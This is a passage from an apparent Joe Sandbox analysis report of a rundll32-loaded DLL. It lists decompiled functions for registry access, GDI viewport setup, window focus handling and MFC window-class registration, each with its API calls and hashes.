						return 0 | _t21 == 0x00000000;
					}
					if(_t28 == 0) {
						goto L3;
					}
					_t21 = RegDeleteValueA(_t28, _a8);
					goto L10;
				}
				_t28 = E1001BCC2(__ecx);
				if(_t28 != 0) {
					_t21 = RegDeleteKeyA(_t28, _a4);
					goto L10;
				}
				goto L3;
			}





                                                                                                        0x1001be92
                                                                                                        0x00000000
                                                                                                        0x1001bf13
                                                                                                        0x1001be98
                                                                                                        0x1001bec1
                                                                                                        0x1001bec3
                                                                                                        0x1001bed7
                                                                                                        0x1001bea5
                                                                                                        0x00000000
                                                                                                        0x1001bea5
                                                                                                        0x1001beef
                                                                                                        0x1001bef5
                                                                                                        0x1001bef8
                                                                                                        0x00000000
                                                                                                        0x1001bf02
                                                                                                        0x1001bec7
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001becd
                                                                                                        0x00000000
                                                                                                        0x1001becd
                                                                                                        0x1001be9f
                                                                                                        0x1001bea3
                                                                                                        0x1001bead
                                                                                                        0x00000000
                                                                                                        0x1001bead
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • RegDeleteKeyA.ADVAPI32(00000000,?), ref: 1001BEAD
                                                                                                        • RegDeleteValueA.ADVAPI32(00000000,00000000), ref: 1001BECD
                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 1001BEF8
                                                                                                          • Part of subcall function 1001BCC2: RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 1001BCF0
                                                                                                          • Part of subcall function 1001BCC2: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 1001BD13
                                                                                                          • Part of subcall function 1001BCC2: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 1001BD2F
                                                                                                          • Part of subcall function 1001BCC2: RegCloseKey.ADVAPI32(?), ref: 1001BD3F
                                                                                                          • Part of subcall function 1001BCC2: RegCloseKey.ADVAPI32(?), ref: 1001BD49
                                                                                                        • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 1001BF13
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Close$CreateDelete$OpenPrivateProfileStringValueWrite
                                                                                                        • String ID:
                                                                                                        • API String ID: 1886894508-0
                                                                                                        • Opcode ID: 4ae44e6718026b6d3adbd8c401423c9add490a928bfb51c3cb960ce7f09616db
                                                                                                        • Instruction ID: d4c736123ee2640320a49d0280915aecea038eaea336f8f966d61f40c6868dd6
                                                                                                        • Opcode Fuzzy Hash: 4ae44e6718026b6d3adbd8c401423c9add490a928bfb51c3cb960ce7f09616db
                                                                                                        • Instruction Fuzzy Hash: 60112E36401A25EBDB629F64CC48BDE3AE9EF047A1F014414FE14AD060DB75CA96EB90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 100342AA, Relevance: 9.1, APIs: 6, Instructions: 54COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 77%
                                                                                                        			E100342AA(void* __ecx) {
				int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __ebp;
				int _t14;
				void* _t40;

				_push(__ecx);
				_push(__ecx);
				_t14 = GetDeviceCaps( *(__ecx + 8), 0xa);
				_v12 = GetDeviceCaps( *(__ecx + 8), 8);
				_v8 = _t14;
				E10033FD4(__ecx,  &_v12);
				SetMapMode( *(__ecx + 4), 1);
				SetWindowOrgEx( *(__ecx + 4), 0, 0, 0);
				SetViewportOrgEx( *(__ecx + 4),  *(__ecx + 0x20),  *(__ecx + 0x24), 0);
				IntersectClipRect( *(__ecx + 4), 0xffffffff, 0xffffffff, _v12 + 2, _v8 + 2);
				return E100341AE(_t14, __ecx, 0, _t40, 0);
			}










                                                                                                        0x100342ad
                                                                                                        0x100342ae
                                                                                                        0x100342bf
                                                                                                        0x100342ca
                                                                                                        0x100342d3
                                                                                                        0x100342d6
                                                                                                        0x100342e0
                                                                                                        0x100342ee
                                                                                                        0x100342fe
                                                                                                        0x10034319
                                                                                                        0x1003432b

                                                                                                        APIs
                                                                                                        • GetDeviceCaps.GDI32(?,0000000A), ref: 100342BF
                                                                                                        • GetDeviceCaps.GDI32(?,00000008), ref: 100342C8
                                                                                                          • Part of subcall function 10033FD4: GetViewportExtEx.GDI32(?,?), ref: 10033FE5
                                                                                                          • Part of subcall function 10033FD4: GetWindowExtEx.GDI32(?,?), ref: 10033FF2
                                                                                                        • SetMapMode.GDI32(?,00000001), ref: 100342E0
                                                                                                        • SetWindowOrgEx.GDI32(?,00000000,00000000,00000000), ref: 100342EE
                                                                                                        • SetViewportOrgEx.GDI32(?,?,?,00000000), ref: 100342FE
                                                                                                        • IntersectClipRect.GDI32(?,000000FF,000000FF,?,?), ref: 10034319
                                                                                                          • Part of subcall function 100341AE: GetViewportExtEx.GDI32(?,?,00000000,?,00000000,?,10034327,00000000), ref: 100341C6
                                                                                                          • Part of subcall function 100341AE: GetWindowExtEx.GDI32(?,?,?,00000000,?,10034327,00000000), ref: 100341D3
                                                                                                          • Part of subcall function 100341AE: GetDeviceCaps.GDI32(?,00000058), ref: 10034233
                                                                                                          • Part of subcall function 100341AE: GetDeviceCaps.GDI32(?,0000005A), ref: 10034250
                                                                                                          • Part of subcall function 100341AE: SetMapMode.GDI32(00000000,00000008), ref: 10034277
                                                                                                          • Part of subcall function 100341AE: SetWindowExtEx.GDI32(00000000,?,?,00000000), ref: 10034288
                                                                                                          • Part of subcall function 100341AE: SetViewportExtEx.GDI32(00000000,?,?,00000000), ref: 10034299
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CapsDeviceViewportWindow$Mode$ClipIntersectRect
                                                                                                        • String ID:
                                                                                                        • API String ID: 1729379761-0
                                                                                                        • Opcode ID: d58e6b4533086b434433f3f8f68d4ad0ba625b868022c02acc2bf3f780f3c89c
                                                                                                        • Instruction ID: f51b1c442fe68410bda884420efd57ad2fc572574380a9b6e1a1ccd0c6538767
                                                                                                        • Opcode Fuzzy Hash: d58e6b4533086b434433f3f8f68d4ad0ba625b868022c02acc2bf3f780f3c89c
                                                                                                        • Instruction Fuzzy Hash: 16019231600A14BFDB615B66CD4AD4BBFFDEF85B10B00461DF556E22B0DA71A900CB10
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 10029945, Relevance: 9.0, APIs: 6, Instructions: 48windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 95%
                                                                                                        			E10029945(struct HWND__* _a4) {
				void* __ebx;
				void* __edi;
				struct HWND__* _t3;
				struct HWND__* _t6;
				void* _t7;
				void* _t10;
				struct HWND__* _t12;
				struct HWND__* _t15;

				_t3 = GetFocus();
				_t15 = _t3;
				if(_t15 != 0) {
					_t12 = _a4;
					if(_t15 == _t12) {
						L10:
						return _t3;
					}
					_push(_t7);
					if(E10029831(_t7, _t10, _t12, _t15, 3) != 0) {
						L5:
						if(_t12 == 0 || (GetWindowLongA(_t12, 0xfffffff0) & 0x40000000) == 0) {
							L8:
							_t3 = SendMessageA(_t15, 0x14f, 0, 0);
							goto L9;
						} else {
							_t6 = GetParent(_t12);
							_t3 = GetDesktopWindow();
							if(_t6 == _t3) {
								L9:
								goto L10;
							}
							goto L8;
						}
					}
					_t3 = GetParent(_t15);
					_t15 = _t3;
					if(_t15 == _t12) {
						goto L9;
					}
					_t3 = E10029831(GetParent, _t10, _t12, _t15, 2);
					if(_t3 == 0) {
						goto L9;
					}
					goto L5;
				}
				return _t3;
			}











                                                                                                        0x10029946
                                                                                                        0x1002994c
                                                                                                        0x10029950
                                                                                                        0x10029953
                                                                                                        0x10029959
                                                                                                        0x100299b7
                                                                                                        0x00000000
                                                                                                        0x100299b7
                                                                                                        0x1002995b
                                                                                                        0x1002996c
                                                                                                        0x10029983
                                                                                                        0x10029985
                                                                                                        0x100299a6
                                                                                                        0x100299b0
                                                                                                        0x00000000
                                                                                                        0x10029997
                                                                                                        0x10029998
                                                                                                        0x1002999c
                                                                                                        0x100299a4
                                                                                                        0x100299b6
                                                                                                        0x00000000
                                                                                                        0x100299b6
                                                                                                        0x00000000
                                                                                                        0x100299a4
                                                                                                        0x10029985
                                                                                                        0x1002996f
                                                                                                        0x10029971
                                                                                                        0x10029975
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1002997a
                                                                                                        0x10029981
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10029981
                                                                                                        0x100299b9

                                                                                                        APIs
                                                                                                        • GetFocus.USER32 ref: 10029946
                                                                                                        • GetParent.USER32(00000000), ref: 1002996F
                                                                                                          • Part of subcall function 10029831: GetWindowLongA.USER32 ref: 10029850
                                                                                                          • Part of subcall function 10029831: GetClassNameA.USER32(00000000,?,0000000A), ref: 10029865
                                                                                                        • GetWindowLongA.USER32 ref: 1002998A
                                                                                                        • GetParent.USER32(?), ref: 10029998
                                                                                                        • GetDesktopWindow.USER32 ref: 1002999C
                                                                                                        • SendMessageA.USER32 ref: 100299B0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$LongParent$ClassDesktopFocusMessageNameSend
                                                                                                        • String ID:
                                                                                                        • API String ID: 3020784601-0
                                                                                                        • Opcode ID: ba4afd5e6474a42e1ab121ad40d02b50c51118f1f472d7d6daffd8a97399a957
                                                                                                        • Instruction ID: acf78fc150144fee3bf4eaa21aef6e3b1a21923878db55d1d0888158b1e06290
                                                                                                        • Opcode Fuzzy Hash: ba4afd5e6474a42e1ab121ad40d02b50c51118f1f472d7d6daffd8a97399a957
                                                                                                        • Instruction Fuzzy Hash: 84F0F43150152026E362D72D7C95FAE5198DF81AF4F910218FD45F22D8DB289D8141A9
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 1003594E, Relevance: 9.0, APIs: 6, Instructions: 47registrystringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 91%
                                                                                                        			E1003594E(void* _a4, char* _a8, char* _a12) {
				void* _t14;
				long _t18;
				signed int _t20;
				long _t25;

				if(_a12 != 0) {
					if(RegCreateKeyA(0x80000000, _a4,  &_a4) != 0) {
						L6:
						_t14 = 0;
						L7:
						return _t14;
					}
					_t25 = RegSetValueExA(_a4, _a12, 0, 1, _a8, lstrlenA(_a8) + 1);
					_t18 = RegCloseKey(_a4);
					if(_t18 != 0 || _t25 != 0) {
						goto L6;
					} else {
						_t14 = _t18 + 1;
						goto L7;
					}
				}
				_t20 = RegSetValueA(0x80000000, _a4, 1, _a8, lstrlenA(_a8));
				asm("sbb eax, eax");
				return  ~_t20 + 1;
			}







                                                                                                        0x10035955
                                                                                                        0x10035990
                                                                                                        0x100359c6
                                                                                                        0x100359c6
                                                                                                        0x100359c8
                                                                                                        0x00000000
                                                                                                        0x100359c8
                                                                                                        0x100359b3
                                                                                                        0x100359b5
                                                                                                        0x100359bd
                                                                                                        0x00000000
                                                                                                        0x100359c3
                                                                                                        0x100359c3
                                                                                                        0x00000000
                                                                                                        0x100359c3
                                                                                                        0x100359bd
                                                                                                        0x1003596e
                                                                                                        0x10035976
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • lstrlenA.KERNEL32(?), ref: 1003595A
                                                                                                        • RegSetValueA.ADVAPI32(80000000,?,00000001,?,00000000), ref: 1003596E
                                                                                                        • RegCreateKeyA.ADVAPI32(80000000,?,?), ref: 10035988
                                                                                                        • lstrlenA.KERNEL32(?), ref: 10035995
                                                                                                        • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,?,00000001), ref: 100359AA
                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 100359B5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Valuelstrlen$CloseCreate
                                                                                                        • String ID:
                                                                                                        • API String ID: 306239685-0
                                                                                                        • Opcode ID: a94474bab4ef5212944d8fbd827d5bcf346c71c4084935d8397085e506667b1f
                                                                                                        • Instruction ID: eef8e99eaa8213a472842ce7001fabd756c560ec0ae423e695ca1d1f488994b8
                                                                                                        • Opcode Fuzzy Hash: a94474bab4ef5212944d8fbd827d5bcf346c71c4084935d8397085e506667b1f
                                                                                                        • Instruction Fuzzy Hash: 4B012832500219FFEF525FA0DC48B993B6AEB087A3F108411FE1AE8070D7728A609B90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 100298D3, Relevance: 9.0, APIs: 6, Instructions: 45COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 38%
                                                                                                        			E100298D3(struct HWND__* _a4, struct tagPOINT _a8, intOrPtr _a12) {
				struct tagRECT _v20;
				struct HWND__* _t12;
				struct HWND__* _t21;

				ClientToScreen(_a4,  &_a8);
				_push(5);
				_push(_a4);
				while(1) {
					_t12 = GetWindow();
					_t21 = _t12;
					if(_t21 == 0) {
						break;
					}
					if(GetDlgCtrlID(_t21) != 0 && (GetWindowLongA(_t21, 0xfffffff0) & 0x10000000) != 0) {
						GetWindowRect(_t21,  &_v20);
						_push(_a12);
						if(PtInRect( &_v20, _a8) != 0) {
							return _t21;
						}
					}
					_push(2);
					_push(_t21);
				}
				return _t12;
			}






                                                                                                        0x100298e2
                                                                                                        0x100298ee
                                                                                                        0x100298f0
                                                                                                        0x10029933
                                                                                                        0x10029933
                                                                                                        0x10029935
                                                                                                        0x10029939
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100298ff
                                                                                                        0x10029916
                                                                                                        0x1002991c
                                                                                                        0x1002992e
                                                                                                        0x00000000
                                                                                                        0x10029941
                                                                                                        0x1002992e
                                                                                                        0x10029930
                                                                                                        0x10029932
                                                                                                        0x10029932
                                                                                                        0x1002993e

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$Rect$ClientCtrlLongScreen
                                                                                                        • String ID:
                                                                                                        • API String ID: 1315500227-0
                                                                                                        • Opcode ID: 8982c2fd6fcec8ea508d22f26e7a804004c5006e86d2846448e6ad8d0ebf8d54
                                                                                                        • Instruction ID: 8d5d5133ea00a710a2f54a7d984ebf02fce7fee90322d912fb676cbb000024d2
                                                                                                        • Opcode Fuzzy Hash: 8982c2fd6fcec8ea508d22f26e7a804004c5006e86d2846448e6ad8d0ebf8d54
                                                                                                        • Instruction Fuzzy Hash: C8016235501525BBDB119F589C49E9E376CEF517A1F404118FD11A6050EB30DA41CB94
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 100059F0, Relevance: 9.0, APIs: 6, Instructions: 38COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E100059F0(void* __ebx, int* __esi) {
				int _t15;
				int _t18;
				intOrPtr _t26;
				void* _t28;

				_t26 =  *((intOrPtr*)(_t28 + 8));
				 *((intOrPtr*)(_t28 + 0x14)) = GetDeviceCaps( *(_t26 + 8), 0x5a);
				 *__esi = MulDiv( *__esi, GetDeviceCaps( *(__ebx + 8), 0x5a),  *(_t28 + 0xc));
				_t15 = GetDeviceCaps( *(_t26 + 8), 0x58);
				_t18 = MulDiv(__esi[1], GetDeviceCaps( *(__ebx + 8), 0x58), _t15);
				__esi[1] = _t18;
				return _t18;
			}







                                                                                                        0x100059f1
                                                                                                        0x10005a0a
                                                                                                        0x10005a1f
                                                                                                        0x10005a27
                                                                                                        0x10005a39
                                                                                                        0x10005a40
                                                                                                        0x10005a44

                                                                                                        APIs
                                                                                                        • GetDeviceCaps.GDI32(?,0000005A), ref: 10005A02
                                                                                                        • GetDeviceCaps.GDI32(?,0000005A), ref: 10005A0E
                                                                                                        • MulDiv.KERNEL32(00000000,00000000,?), ref: 10005A19
                                                                                                        • GetDeviceCaps.GDI32(?,00000058), ref: 10005A27
                                                                                                        • GetDeviceCaps.GDI32(?,00000058), ref: 10005A31
                                                                                                        • MulDiv.KERNEL32(?,00000000,00000000), ref: 10005A39
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CapsDevice
                                                                                                        • String ID:
                                                                                                        • API String ID: 328075279-0
                                                                                                        • Opcode ID: a5c112f78b88f4bf1311636ece6e0dd5a93fb4083a1b161f9464fc113d583973
                                                                                                        • Instruction ID: 85e2ce73d3cc40e8ba857868d8035ba56c050d68c0307686b6259cd0027a5177
                                                                                                        • Opcode Fuzzy Hash: a5c112f78b88f4bf1311636ece6e0dd5a93fb4083a1b161f9464fc113d583973
                                                                                                        • Instruction Fuzzy Hash: 88F0EC75640704AFD750DFA9CC48D47F7ECAF98B01F008919FA89D7290D670E9408F60
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 1001120A, Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 234COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 94%
                                                                                                        			E1001120A(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				char* _v20;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v40;
				intOrPtr _v52;
				signed int _v56;
				void* __ebp;
				intOrPtr _t122;
				void* _t128;
				intOrPtr _t130;
				signed int _t139;
				signed int _t144;
				signed int _t175;
				signed int _t177;
				signed int _t179;
				signed int _t181;
				signed int _t183;
				signed int _t187;
				void* _t190;
				intOrPtr _t191;
				signed int _t201;

				_t190 = __ecx;
				_t122 = E1000AB19(__ebx, __edi, __esi, __eflags);
				_v8 = _t122;
				_t3 =  &_a4;
				 *_t3 = _a4 &  !( *(_t122 + 0x18));
				if( *_t3 == 0) {
					return 1;
				}
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t201 = 0;
				E1003E9B0(0,  &_v56, 0, 0x28);
				_v52 = DefWindowProcA;
				_t128 = E1000AB19(__ebx, 0, 0, __eflags);
				__eflags = _a4 & 0x00000001;
				_v40 =  *((intOrPtr*)(_t128 + 8));
				_t130 =  *0x10099150; // 0x10003
				_t187 = 8;
				_v32 = _t130;
				_v16 = _t187;
				if(__eflags != 0) {
					_push( &_v56);
					_v56 = 0xb;
					_v20 = "AfxWnd80s";
					_t183 = E10010F23(_t187, _t190, 0, 0, __eflags);
					__eflags = _t183;
					if(_t183 != 0) {
						_t201 = 1;
						__eflags = 1;
					}
				}
				__eflags = _a4 & 0x00000020;
				if(__eflags != 0) {
					_v56 = _v56 | 0x0000008b;
					_push( &_v56);
					_v20 = "AfxOleControl80s";
					_t181 = E10010F23(_t187, _t190, 0, _t201, __eflags);
					__eflags = _t181;
					if(_t181 != 0) {
						_t201 = _t201 | 0x00000020;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & 0x00000002;
				if(__eflags != 0) {
					_push( &_v56);
					_v56 = 0;
					_v20 = "AfxControlBar80s";
					_v28 = 0x10;
					_t179 = E10010F23(_t187, _t190, 0, _t201, __eflags);
					__eflags = _t179;
					if(_t179 != 0) {
						_t201 = _t201 | 0x00000002;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & 0x00000004;
				if(__eflags != 0) {
					_v56 = _t187;
					_v28 = 0;
					_t177 = E100111C9(_t190, __eflags,  &_v56, "AfxMDIFrame80s", 0x7a01);
					__eflags = _t177;
					if(_t177 != 0) {
						_t201 = _t201 | 0x00000004;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & _t187;
				if(__eflags != 0) {
					_v56 = 0xb;
					_v28 = 6;
					_t175 = E100111C9(_t190, __eflags,  &_v56, "AfxFrameOrView80s", 0x7a02);
					__eflags = _t175;
					if(_t175 != 0) {
						_t201 = _t201 | _t187;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & 0x00000010;
				if(__eflags != 0) {
					_v12 = 0xff;
					_t201 = _t201 | E1000EC9E(_t187, _t190, _t201, __eflags,  &_v16, 0x3fc0);
					_t48 =  &_a4;
					 *_t48 = _a4 & 0xffffc03f;
					__eflags =  *_t48;
				}
				__eflags = _a4 & 0x00000040;
				if(__eflags != 0) {
					_v12 = 0x10;
					_t201 = _t201 | E1000EC9E(_t187, _t190, _t201, __eflags,  &_v16, 0x40);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000080;
				if(__eflags != 0) {
					_v12 = 2;
					_t201 = _t201 | E1000EC9E(_t187, _t190, _t201, __eflags,  &_v16, 0x80);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000100;
				if(__eflags != 0) {
					_v12 = _t187;
					_t201 = _t201 | E1000EC9E(_t187, _t190, _t201, __eflags,  &_v16, 0x100);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000200;
				if(__eflags != 0) {
					_v12 = 0x20;
					_t201 = _t201 | E1000EC9E(_t187, _t190, _t201, __eflags,  &_v16, 0x200);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000400;
				if(__eflags != 0) {
					_v12 = 1;
					_t201 = _t201 | E1000EC9E(0x400, _t190, _t201, __eflags,  &_v16, 0x400);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000800;
				if(__eflags != 0) {
					_v12 = 0x40;
					_t201 = _t201 | E1000EC9E(0x400, _t190, _t201, __eflags,  &_v16, 0x800);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00001000;
				if(__eflags != 0) {
					_v12 = 4;
					_t201 = _t201 | E1000EC9E(0x400, _t190, _t201, __eflags,  &_v16, 0x1000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00002000;
				if(__eflags != 0) {
					_v12 = 0x80;
					_t201 = _t201 | E1000EC9E(0x400, _t190, _t201, __eflags,  &_v16, 0x2000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00004000;
				if(__eflags != 0) {
					_v12 = 0x800;
					_t201 = _t201 | E1000EC9E(0x400, _t190, _t201, __eflags,  &_v16, 0x4000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00008000;
				if(__eflags != 0) {
					_v12 = 0x400;
					_t201 = _t201 | E1000EC9E(0x400, _t190, _t201, __eflags,  &_v16, 0x8000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00010000;
				if(__eflags != 0) {
					_v12 = 0x200;
					_t201 = _t201 | E1000EC9E(0x400, _t190, _t201, __eflags,  &_v16, 0x10000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00020000;
				if(__eflags != 0) {
					_v12 = 0x100;
					_t201 = _t201 | E1000EC9E(0x400, _t190, _t201, __eflags,  &_v16, 0x20000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00040000;
				if(__eflags != 0) {
					_v12 = 0x8000;
					_t201 = _t201 | E1000EC9E(0x400, _t190, _t201, __eflags,  &_v16, 0x40000);
					__eflags = _t201;
				}
				_t191 = _v8;
				 *(_t191 + 0x18) =  *(_t191 + 0x18) | _t201;
				_t139 =  *(_t191 + 0x18);
				__eflags = (_t139 & 0x00003fc0) - 0x3fc0;
				if((_t139 & 0x00003fc0) == 0x3fc0) {
					 *(_t191 + 0x18) = _t139 | 0x00000010;
					_t201 = _t201 | 0x00000010;
					__eflags = _t201;
				}
				asm("sbb eax, eax");
				_t144 =  ~((_t201 & _a4) - _a4) + 1;
				__eflags = _t144;
				return _t144;
			}



























                                                                                                        0x1001120a
                                                                                                        0x10011210
                                                                                                        0x10011215
                                                                                                        0x1001121d
                                                                                                        0x1001121d
                                                                                                        0x10011220
                                                                                                        0x00000000
                                                                                                        0x10011224
                                                                                                        0x1001122a
                                                                                                        0x1001122b
                                                                                                        0x1001122c
                                                                                                        0x10011236
                                                                                                        0x10011238
                                                                                                        0x10011245
                                                                                                        0x10011248
                                                                                                        0x1001124d
                                                                                                        0x10011256
                                                                                                        0x10011259
                                                                                                        0x1001125e
                                                                                                        0x1001125f
                                                                                                        0x10011262
                                                                                                        0x10011265
                                                                                                        0x1001126a
                                                                                                        0x1001126b
                                                                                                        0x10011272
                                                                                                        0x10011279
                                                                                                        0x1001127e
                                                                                                        0x10011280
                                                                                                        0x10011282
                                                                                                        0x10011282
                                                                                                        0x10011282
                                                                                                        0x10011280
                                                                                                        0x10011283
                                                                                                        0x10011287
                                                                                                        0x10011289
                                                                                                        0x10011293
                                                                                                        0x10011294
                                                                                                        0x1001129b
                                                                                                        0x100112a0
                                                                                                        0x100112a2
                                                                                                        0x100112a4
                                                                                                        0x100112a4
                                                                                                        0x100112a4
                                                                                                        0x100112a2
                                                                                                        0x100112a7
                                                                                                        0x100112ab
                                                                                                        0x100112b0
                                                                                                        0x100112b1
                                                                                                        0x100112b4
                                                                                                        0x100112bb
                                                                                                        0x100112c2
                                                                                                        0x100112c7
                                                                                                        0x100112c9
                                                                                                        0x100112cb
                                                                                                        0x100112cb
                                                                                                        0x100112cb
                                                                                                        0x100112c9
                                                                                                        0x100112ce
